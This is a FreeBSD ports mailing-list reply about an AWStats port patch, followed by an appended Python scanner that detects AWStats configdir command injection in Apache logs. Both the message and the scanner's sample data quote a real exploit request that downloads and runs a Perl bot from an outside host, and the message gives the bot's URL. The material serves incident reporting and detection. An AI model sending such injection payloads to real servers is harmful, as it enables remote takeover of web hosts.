Date: Wed, 26 Jan 2005 19:53:21 -0800
From: Charlie Schluting <charlie@schluting.com>
To: ports@freebsd.org
Subject: Re: FreeBSD Port: awstats-6.2
Message-ID: <41F865B1.1030901@schluting.com>
In-Reply-To: <20050127012022.GD18600@hal9000.halplant.com>
References: <41F00880.2050506@covad.net> <41F71C20.4080002@covad.net> <790a9fff05012608282ceb53b2@mail.gmail.com> <20050127012022.GD18600@hal9000.halplant.com>
On 1/26/2005 5:20 PM, Andrew J Caines wrote:
> FWIW, I think the original patch posted was lacking some changes in the
> pkg-plist which may or may not have been in the 6.2 update, when various
> bits moved around and the installed files changed.
>
> I've made another[1] for the 6.3 port[2]. This 6.3 port builds, installs,
> runs[3] and deinstalls cleanly. It doesn't specifically address any .jar
> install or other issues.

Indeed, the patch works (had to manually grab the tarball).

FWIW, yes, exploits are definitely in the wild. I grepped my logs for "wget" and saw one (successful) attempt:

/var/log/httpd-access.log:66.235.209.85 - - [26/Jan/2005:17:43:22 -0800] "GET /awstats/awstats.pl?configdir=%20%7Cecho%20;echo%20;cd%20/var/tmp;wget%20www.theplaza.co.uk/media/bot%20-O%20bot22;perl%20bot22;rm%20-f%20bot*;echo%20;echo%20%7C%20 HTTP/1.1" 200 588 "-" "LWP::Simple/5.65"

If you look at the code on:

http://www.theplaza.co.uk/media/bot

you'll see that it tries to start:

www 29943 101.6 0.5 4236 3504 ?? R 5:38PM 113:06.70 /usr/local/apache/bin/httpd -DSS1 (perl)

Fuckers :(

Thanks for the patch!

-Charlie
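The grep-for-"wget" check above finds one bot but misses any payload that fetches its second stage with curl, fetch or Perl's LWP. As an added example (not code from this message, the ports tree or the AWStats project), here is a small Python scanner that instead parses combined-format Apache access log lines, percent-decodes the query string of every request to awstats.pl and reports any configdir value containing shell metacharacters, returning the injected command so the analyst sees what was run. The sample log embeds the attempt quoted above (grep filename prefix removed) beside two constructed benign requests; the 192.0.2.x hosts, the /usr/local/etc/awstats path and the user agents in those two lines are assumptions.

```python
"""Flag AWStats configdir command injection in Apache access logs.

Added example, not code from the original message or the AWStats project.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log format; the request target is kept raw so that
# percent-encoding survives until we decode it ourselves.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Characters that never belong in a configuration directory name.
SHELL_META = re.compile(r'[|;&`$<>\n]')


def parse_line(line):
    """Return the fields of one combined-format log line, or None."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def query_params(query):
    """Split a raw query string on '&' only and percent-decode it.

    Deliberately not urllib's parse_qs: older versions also split on ';',
    which would shred the very payload we want to see whole.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def injected_command(entry):
    """Return the shell command smuggled through configdir, or None."""
    target = urlsplit(entry["target"])
    if not target.path.endswith("/awstats.pl"):
        return None
    for value in query_params(target.query).get("configdir", []):
        if SHELL_META.search(value):
            # The in-the-wild payload wraps the command in " |...| ", the
            # form that turns a two-argument Perl open() into a pipe; strip
            # that wrapper so only the command itself is reported.
            return value.strip(" |")
    return None


def scan(lines):
    """Return (host, status, command) for every injection attempt found."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        cmd = injected_command(entry)
        if cmd is not None:
            hits.append((entry["host"], int(entry["status"]), cmd))
    return hits


# Sample input: line 1 is the attempt quoted in the message (grep prefix
# removed); lines 2 and 3 are constructed benign requests for contrast.
SAMPLE_LOG = [
    '66.235.209.85 - - [26/Jan/2005:17:43:22 -0800] "GET /awstats/awstats.pl?'
    'configdir=%20%7Cecho%20;echo%20;cd%20/var/tmp;wget%20www.theplaza.co.uk/'
    'media/bot%20-O%20bot22;perl%20bot22;rm%20-f%20bot*;echo%20;echo%20%7C%20 '
    'HTTP/1.1" 200 588 "-" "LWP::Simple/5.65"',
    '192.0.2.10 - - [26/Jan/2005:17:50:01 -0800] "GET /awstats/awstats.pl?'
    'config=example.org&configdir=/usr/local/etc/awstats HTTP/1.1" 200 14021 '
    '"-" "Mozilla/5.0"',
    '192.0.2.11 - - [26/Jan/2005:17:51:30 -0800] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, status, cmd in scan(SAMPLE_LOG):
        print(f"{host} status={status} cmd={cmd!r}")
```

Run against the sample it reports the one hit from 66.235.209.85 with the decoded `cd /var/tmp;wget ...;perl bot22;rm -f bot*` chain. Note that a 200 status only tells you the CGI answered; whether the fetched script actually ran is what the ps output in the message establishes, so pair the log hit with a process check on the web server's uid.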
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?41F865B1.1030901>